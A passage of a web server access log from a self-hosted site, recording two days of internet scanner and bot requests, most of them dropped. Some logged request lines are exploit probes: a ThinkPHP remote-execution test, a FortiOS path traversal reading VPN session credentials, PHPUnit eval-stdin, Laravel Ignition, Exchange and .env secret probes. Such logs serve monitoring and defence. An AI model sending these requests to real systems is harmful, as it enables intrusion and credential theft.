like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [27/Oct/2021:03:53:06 +0000] 444 - GET https opds.moralanimal.net "/" [Client 34.86.35.5] [Length 0] [Gzip -] "Expanse indexes the network perimeters of our customers. If you have any questions or concerns, please reach out to: scaninfo@expanseinc.com" "-" [27/Oct/2021:04:04:06 +0000] 444 - GET https opds.moralanimal.net "/" [Client 34.96.130.27] [Length 0] [Gzip -] "Expanse indexes the network perimeters of our customers. If you have any questions or concerns, please reach out to: scaninfo@expanseinc.com" "-" [27/Oct/2021:04:14:46 +0000] 400 - GET http localhost "/ab2g" [Client 165.232.186.144] [Length 154] [Gzip -] "-" "-" [27/Oct/2021:04:14:46 +0000] 400 - GET http localhost "/ab2h" [Client 165.232.186.144] [Length 154] [Gzip -] "-" "-" [27/Oct/2021:04:18:40 +0000] 444 - POST https 192.168.0.1 "/GponForm/diag_Form?style/" [Client 192.3.154.35] [Length 0] [Gzip -] "curl/7.3.2" "-" [27/Oct/2021:05:04:01 +0000] 444 - GET https jdownloader.moralanimal.net "/" [Client 34.96.130.14] [Length 0] [Gzip -] "Expanse indexes the network perimeters of our customers. If you have any questions or concerns, please reach out to: scaninfo@expanseinc.com" "-" [27/Oct/2021:05:10:22 +0000] 444 - GET https 64.22.31.253 "/owa/auth/x.js" [Client 192.241.208.235] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [27/Oct/2021:05:11:15 +0000] 444 - GET https 64.22.31.253 "/owa/auth/logon.aspx" [Client 192.241.205.35] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [27/Oct/2021:05:12:53 +0000] 444 - GET https 64.22.31.253 "/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application" [Client 198.199.111.94] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [27/Oct/2021:05:17:35 +0000] 444 - GET https jdownloader.moralanimal.net "/" [Client 34.96.130.23] [Length 0] [Gzip -] "Expanse indexes the network perimeters of our customers. If you have any questions or concerns, please reach out to: scaninfo@expanseinc.com" "-" [27/Oct/2021:05:45:45 +0000] 444 - GET https 64.22.31.253 "/" [Client 193.106.29.210] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0" "-" [27/Oct/2021:06:00:28 +0000] 444 - GET https 64.22.31.253 "/" [Client 103.203.59.1] [Length 0] [Gzip -] "HTTP Banner Detection (https://security.ipip.net)" "-" [27/Oct/2021:07:05:13 +0000] 444 - GET https 64.22.31.253 "/bag2" [Client 139.162.145.250] [Length 0] [Gzip -] "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0)" "-" [27/Oct/2021:08:08:13 +0000] 400 - - http localhost "-" [Client 87.251.64.137] [Length 154] [Gzip -] "-" "-" [27/Oct/2021:08:44:06 +0000] 444 - GET https 64.22.31.253 "/actuator/health" [Client 192.241.199.149] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [27/Oct/2021:09:55:57 +0000] 444 - GET https 64.22.31.253 "/" [Client 128.14.133.58] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [27/Oct/2021:10:13:03 +0000] 400 - GET http localhost "/ab2g" [Client 137.184.210.182] [Length 154] [Gzip -] "-" "-" [27/Oct/2021:10:13:03 +0000] 400 - GET http localhost "/ab2h" [Client 137.184.210.182] [Length 154] [Gzip -] "-" "-" [27/Oct/2021:10:23:42 +0000] 444 - GET https 64.22.31.253 "/" [Client 80.82.77.192] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36" "-" [27/Oct/2021:10:29:21 +0000] 400 - GET http 64.22.31.253 "/" [Client 80.82.77.192] [Length 252] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [27/Oct/2021:10:57:14 +0000] 400 - POST http 64.22.31.253 "/" [Client 181.214.206.162] [Length 654] [Gzip -] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36" "-" [27/Oct/2021:11:51:52 +0000] 400 - - http localhost "-" [Client 87.251.64.137] [Length 154] [Gzip -] "-" "-" [27/Oct/2021:12:10:08 +0000] 400 - - http localhost "-" [Client 89.248.165.120] [Length 154] [Gzip -] "-" "-" [27/Oct/2021:13:14:27 +0000] 444 - GET https 64.22.31.253 "/owa/auth/logon.aspx?url=https%3a%2f%2f1%2fecp%2f" [Client 192.241.208.40] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [27/Oct/2021:14:26:30 +0000] 444 - GET https 64.22.31.253 "/" [Client 192.241.203.105] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [27/Oct/2021:14:33:17 +0000] 400 - GET http 64.22.31.253 "/config/getuser?index=0" [Client 209.141.41.12] [Length 252] [Gzip -] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0" "-" [27/Oct/2021:17:00:05 +0000] 444 - GET https 64.22.31.253 "/?XDEBUG_SESSION_START=phpstorm" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [27/Oct/2021:17:00:05 +0000] 444 - POST https 64.22.31.253 "/mifs/.;/services/LogService" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "https://64.22.31.253:443" [27/Oct/2021:17:00:06 +0000] 444 - GET https 64.22.31.253 "/wp-content/plugins/wp-file-manager/readme.txt" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [27/Oct/2021:17:00:08 +0000] 444 - GET https 64.22.31.253 "/console/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [27/Oct/2021:17:00:08 +0000] 444 - GET https 64.22.31.253 "/_ignition/execute-solution" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [27/Oct/2021:17:00:10 +0000] 444 - POST https 64.22.31.253 "/Autodiscover/Autodiscover.xml" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [27/Oct/2021:17:00:11 +0000] 444 - GET https 64.22.31.253 "/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [27/Oct/2021:17:00:12 +0000] 400 - POST https localhost "-" [Client 45.146.164.110] [Length 154] [Gzip -] "-" "-" [27/Oct/2021:17:00:12 +0000] 444 - GET https 64.22.31.253 "/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [27/Oct/2021:17:00:14 +0000] 444 - POST https 64.22.31.253 "/api/jsonws/invoke" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [27/Oct/2021:17:00:15 +0000] 444 - POST https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [27/Oct/2021:17:00:17 +0000] 444 - GET https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [27/Oct/2021:17:00:17 +0000] 444 - GET https 64.22.31.253 "/index.php?s=/Index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [27/Oct/2021:17:09:53 +0000] 444 - GET https 64.22.31.253 "/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession" [Client 103.129.152.82] [Length 0] [Gzip -] "Python-urllib/3.9" "-" [27/Oct/2021:20:43:44 +0000] 400 - GET http 64.22.31.253 "/config/getuser?index=0" [Client 209.141.41.12] [Length 252] [Gzip -] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0" "-" [27/Oct/2021:22:50:36 +0000] 444 - GET https 192.168.1.12 "/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [27/Oct/2021:22:50:36 +0000] 444 - GET https 192.168.1.12 "/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [27/Oct/2021:22:50:36 +0000] 444 - GET https 192.168.1.12 "/ui/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [27/Oct/2021:22:50:36 +0000] 444 - GET https 192.168.1.12 "/ui/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [27/Oct/2021:22:50:36 +0000] 444 - GET https 192.168.1.12 "/favicon.ico" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [27/Oct/2021:22:50:36 +0000] 444 - GET https 192.168.1.12 "/favicon.ico" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [27/Oct/2021:23:20:39 +0000] 444 - GET https 64.22.31.253 "/" [Client 23.129.64.130] [Length 0] [Gzip -] "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" "-" [27/Oct/2021:23:20:55 +0000] 444 - OPTIONS https localhost "/" [Client 45.154.255.147] [Length 0] [Gzip -] "-" "-" [27/Oct/2021:23:21:04 +0000] 400 - - https localhost "-" [Client 23.129.64.153] [Length 154] [Gzip -] "-" "-" [27/Oct/2021:23:21:05 +0000] 444 - GET https localhost "/nice%20ports%2C/Tri%6Eity.txt%2ebak" [Client 23.129.64.153] [Length 0] [Gzip -] "-" "-" [27/Oct/2021:23:21:11 +0000] 400 - - https localhost "-" [Client 23.129.64.153] [Length 154] [Gzip -] "-" "-" [27/Oct/2021:23:24:31 +0000] 400 - GET http 64.22.31.253 "/config/getuser?index=0" [Client 209.141.62.185] [Length 252] [Gzip -] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0" "-" [27/Oct/2021:23:43:38 +0000] 444 - GET https 64.22.31.253 "/" [Client 223.71.167.163] [Length 0] [Gzip -] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:47.0) Gecko/20100101 Firefox/47.0" "-" [27/Oct/2021:23:43:38 +0000] 400 - GET http 64.22.31.253 "/" [Client 223.71.167.163] [Length 252] [Gzip -] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:47.0) Gecko/20100101 Firefox/47.0" "-" [27/Oct/2021:23:46:08 +0000] 400 - - http localhost "-" [Client 89.248.165.52] [Length 154] [Gzip -] "-" "-" [27/Oct/2021:23:46:08 +0000] 400 - - http localhost "-" [Client 89.248.165.52] [Length 154] [Gzip -] "-" "-" [27/Oct/2021:23:46:08 +0000] 400 - - http localhost "-" [Client 89.248.165.52] [Length 154] [Gzip -] "-" "-" [28/Oct/2021:01:13:41 +0000] 444 - GET https 64.22.31.253 "/" [Client 184.105.247.196] [Length 0] [Gzip -] "-" "-" [28/Oct/2021:01:50:46 +0000] 444 - GET https 64.22.31.253 "/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application" [Client 192.241.209.112] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [28/Oct/2021:02:58:50 +0000] 400 - - http localhost "-" [Client 89.248.165.52] [Length 154] [Gzip -] "-" "-" [28/Oct/2021:02:58:50 +0000] 400 - - http localhost "-" [Client 89.248.165.52] [Length 154] [Gzip -] "-" "-" [28/Oct/2021:02:58:51 +0000] 400 - - http localhost "-" [Client 89.248.165.52] [Length 154] [Gzip -] "-" "-" [28/Oct/2021:03:19:25 +0000] 400 - GET http 64.22.31.253 "/.env" [Client 109.237.103.118] [Length 654] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [28/Oct/2021:03:19:26 +0000] 444 - GET https 64.22.31.253 "/.env" [Client 109.237.103.118] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [28/Oct/2021:03:43:24 +0000] 444 - GET https 64.22.31.253 "/" [Client 223.71.167.164] [Length 0] [Gzip -] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:47.0) Gecko/20100101 Firefox/47.0" "-" [28/Oct/2021:03:43:24 +0000] 400 - GET http 64.22.31.253 "/" [Client 223.71.167.164] [Length 252] [Gzip -] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:47.0) Gecko/20100101 Firefox/47.0" "-" [28/Oct/2021:04:06:15 +0000] 400 - GET http 64.22.31.253 "/bag2" [Client 139.162.145.250] [Length 654] [Gzip -] "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0)" "-" [28/Oct/2021:04:12:24 +0000] 400 - GET https localhost "/fu4M" [Client 185.189.182.234] [Length 154] [Gzip -] "-" "-" [28/Oct/2021:04:35:39 +0000] 400 - GET http localhost "/ab2g" [Client 159.223.95.181] [Length 154] [Gzip -] "-" "-" [28/Oct/2021:04:35:39 +0000] 400 - GET http localhost "/ab2h" [Client 159.223.95.181] [Length 154] [Gzip -] "-" "-" [28/Oct/2021:05:10:57 +0000] 444 - GET https 64.22.31.253 "/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application" [Client 192.241.208.195] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [28/Oct/2021:05:11:29 +0000] 444 - GET https 64.22.31.253 "/owa/auth/logon.aspx" [Client 192.241.205.9] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [28/Oct/2021:05:13:28 +0000] 444 - GET https 64.22.31.253 "/owa/auth/x.js" [Client 192.241.200.61] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [28/Oct/2021:05:44:39 +0000] 444 - GET https 64.22.31.253 "/" [Client 162.142.125.193] [Length 0] [Gzip -] "-" "-" [28/Oct/2021:05:44:40 +0000] 400 - GET http 64.22.31.253 "/" [Client 162.142.125.193] [Length 252] [Gzip -] "-" "-" [28/Oct/2021:05:44:40 +0000] 400 - GET http 64.22.31.253 "/" [Client 162.142.125.193] [Length 252] [Gzip -] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" [28/Oct/2021:06:33:46 +0000] 400 - GET http 64.22.31.253 "/config/getuser?index=0" [Client 209.141.62.185] [Length 252] [Gzip -] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0" "-" [28/Oct/2021:07:16:49 +0000] 444 - GET https 64.22.31.253 "/" [Client 154.89.5.46] [Length 0] [Gzip -] "-" "-" [28/Oct/2021:08:47:24 +0000] 444 - GET https 64.22.31.253 "/actuator/health" [Client 192.241.201.168] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [28/Oct/2021:08:50:03 +0000] 400 - GET http 64.22.31.253 "/.env" [Client 185.140.45.26] [Length 252] [Gzip -] "curl/7.38.0" "-" [28/Oct/2021:08:50:03 +0000] 444 - GET https 64.22.31.253 "/.env" [Client 185.140.45.26] [Length 0] [Gzip -] "curl/7.38.0" "-" [28/Oct/2021:09:18:49 +0000] 400 - GET http 64.22.31.253 "/config/getuser?index=0" [Client 209.141.41.12] [Length 252] [Gzip -] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0" "-" [28/Oct/2021:09:38:20 +0000] 444 - GET https 64.22.31.253 "/" [Client 154.89.5.41] [Length 0] [Gzip -] "-" "-" [28/Oct/2021:10:31:58 +0000] 400 - GET http localhost "/ab2g" [Client 165.232.113.197] [Length 154] [Gzip -] "-" "-" [28/Oct/2021:10:31:59 +0000] 400 - GET http localhost "/ab2h" [Client 165.232.113.197] [Length 154] [Gzip -] "-" "-" [28/Oct/2021:11:22:47 +0000] 444 - POST https 192.168.0.1 "/GponForm/diag_Form?style/" [Client 192.3.154.35] [Length 0] [Gzip -] "curl/7.3.2" "-" [28/Oct/2021:11:56:46 +0000] 444 - POST https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [28/Oct/2021:11:56:46 +0000] 444 - POST https 64.22.31.253 "/api/jsonws/invoke" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [28/Oct/2021:11:56:49 +0000] 444 - GET https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [28/Oct/2021:11:56:51 +0000] 444 - GET https 64.22.31.253 "/?XDEBUG_SESSION_START=phpstorm" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [28/Oct/2021:11:56:51 +0000] 444 - GET https 64.22.31.253 "/index.php?s=/Index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [28/Oct/2021:11:56:52 +0000] 444 - POST https 64.22.31.253 "/mifs/.;/services/LogService" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "https://64.22.31.253:443" [28/Oct/2021:11:56:53 +0000] 444 - GET https 64.22.31.253 "/console/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [28/Oct/2021:11:56:55 +0000] 444 - POST https 64.22.31.253 "/Autodiscover/Autodiscover.xml" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [28/Oct/2021:11:56:56 +0000] 444 - GET https 64.22.31.253 "/wp-content/plugins/wp-file-manager/readme.txt" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [28/Oct/2021:11:56:56 +0000] 444 - GET https 64.22.31.253 "/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [28/Oct/2021:11:56:58 +0000] 444 - GET https 64.22.31.253 "/_ignition/execute-solution" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [28/Oct/2021:11:57:01 +0000] 400 - POST https localhost "-" [Client 45.146.164.110] [Length 154] [Gzip -] "-" "-" [28/Oct/2021:11:57:02 +0000] 444 - GET https 64.22.31.253 "/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [28/Oct/2021:12:19:24 +0000] 400 - - http localhost "-" [Client 66.240.205.34] [Length 154] [Gzip -] "-" "-" [28/Oct/2021:12:38:16 +0000] 444 - GET https booksonic.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [28/Oct/2021:12:38:17 +0000] 444 - GET https booksonic.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [28/Oct/2021:13:16:04 +0000] 444 - GET https 64.22.31.253 "/owa/auth/logon.aspx?url=https%3a%2f%2f1%2fecp%2f" [Client 192.241.201.128] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [28/Oct/2021:13:59:09 +0000] 444 - GET https 64.22.31.253 "/" [Client 167.248.133.57] [Length 0] [Gzip -] "-" "-" [28/Oct/2021:13:59:10 +0000] 400 - GET http 64.22.31.253 "/" [Client 167.248.133.57] [Length 252] [Gzip -] "-" "-" [28/Oct/2021:13:59:10 +0000] 400 - GET http 64.22.31.253 "/" [Client 167.248.133.57] [Length 252] [Gzip -] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" [28/Oct/2021:14:27:54 +0000] 444 - GET https 64.22.31.253 "/" [Client 192.241.199.19] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [28/Oct/2021:14:40:17 +0000] 444 - GET https 64.22.31.253 "/" [Client 45.249.246.151] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36" "-" [28/Oct/2021:14:41:00 +0000] 444 - GET https 64.22.31.253 "/" [Client 103.14.35.145] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36" "-" [28/Oct/2021:14:42:01 +0000] 444 - GET https 64.22.31.253 "/" [Client 45.249.246.151] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36" "-" [28/Oct/2021:15:40:21 +0000] 444 - GET https opds.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [28/Oct/2021:15:40:22 +0000] 444 - GET https opds.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [28/Oct/2021:15:50:07 +0000] 444 - GET https komga.moralanimal.net "/" [Client 107.150.63.172] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.90 Safari/537.36" "http://www.google.com.hk" [28/Oct/2021:16:12:21 +0000] 444 - OPTIONS https 64.22.31.253 "/" [Client 35.203.44.85] [Length 0] [Gzip -] "-" "-" [28/Oct/2021:16:20:38 +0000] 444 - GET https 64.22.31.253 "/" [Client 128.1.248.26] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [28/Oct/2021:16:35:07 +0000] 400 - GET http localhost "/ab2g" [Client 143.110.211.4] [Length 154] [Gzip -] "-" "-" [28/Oct/2021:16:35:07 +0000] 400 - GET http localhost "/ab2h" [Client 143.110.211.4] [Length 154] [Gzip -] "-" "-" [28/Oct/2021:17:35:18 +0000] 444 - GET https 64.22.31.253 "/" [Client 154.209.125.20] [Length 0] [Gzip -] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:47.0) Gecko/20100101 Firefox/47.0" "-" [28/Oct/2021:17:56:43 +0000] 444 - GET https guacamole.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [28/Oct/2021:17:56:44 +0000] 444 - GET https guacamole.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [28/Oct/2021:18:39:02 +0000] 444 - GET https 64.22.31.253 "/" [Client 139.162.207.84] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [28/Oct/2021:19:14:20 +0000] 400 - - http localhost "-" [Client 87.251.75.145] [Length 154] [Gzip -] "-" "-" [28/Oct/2021:20:42:46 +0000] 444 - GET https 64.22.31.253 "/" [Client 185.173.35.37] [Length 0] [Gzip -] "NetSystemsResearch studies the availability of various services across the internet. Our website is netsystemsresearch.com" "-" [28/Oct/2021:21:17:23 +0000] 444 - GET https home.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [28/Oct/2021:21:17:24 +0000] 444 - GET https home.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [28/Oct/2021:22:22:09 +0000] 400 - HEAD http localhost "/" [Client 178.128.243.109] [Length 0] [Gzip -] "-" "-" [28/Oct/2021:22:22:10 +0000] 400 - GET http 64.22.31.253 "/system_api.php" [Client 178.128.243.109] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" "-" [28/Oct/2021:22:22:10 +0000] 444 - GET https 64.22.31.253 "/system_api.php" [Client 178.128.243.109] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" "-" [28/Oct/2021:22:22:11 +0000] 400 - GET http 64.22.31.253 "/c/version.js" [Client 178.128.243.109] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" "-" [28/Oct/2021:22:22:11 +0000] 444 - GET https 64.22.31.253 "/c/version.js" [Client 178.128.243.109] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" "-" [28/Oct/2021:22:22:12 +0000] 400 - GET http 64.22.31.253 "/streaming/clients_live.php" [Client 178.128.243.109] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; 